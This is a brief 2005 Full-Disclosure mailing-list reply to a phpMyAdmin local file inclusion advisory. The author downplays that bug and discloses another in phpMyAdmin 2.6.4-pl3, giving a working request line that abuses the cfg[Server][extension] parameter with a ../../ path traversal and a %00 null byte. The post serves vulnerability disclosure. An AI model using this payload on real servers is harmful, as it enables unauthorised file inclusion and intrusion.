Re: Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability (Stefan Esser)

[Maksymilian Arciemowicz <max () jestsuper pl>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

It is low local file inclusion. No critical. Standart have you 
$cfg['ThemePath'].
More critical bug still exists in phpmyadmin. 

phpMyAdmin-2.6.4-pl3/libraries/database_interface.lib.php?cfg[Server]
[extension]=../../mGPC_muss_be_off_%00

org. adv.
http://securityreason.com/achievement_securityalert/1

Maksymilian Arciemowicz max () jestsuper pl
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDW8673Ke13X/fTO4RAsbzAKCv8tkGfD5dAbliWlaLMkfLkYnVfgCgs9RE
HllDGmvD6iOQiSeH9Sk4WCQ=
=9U2v
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/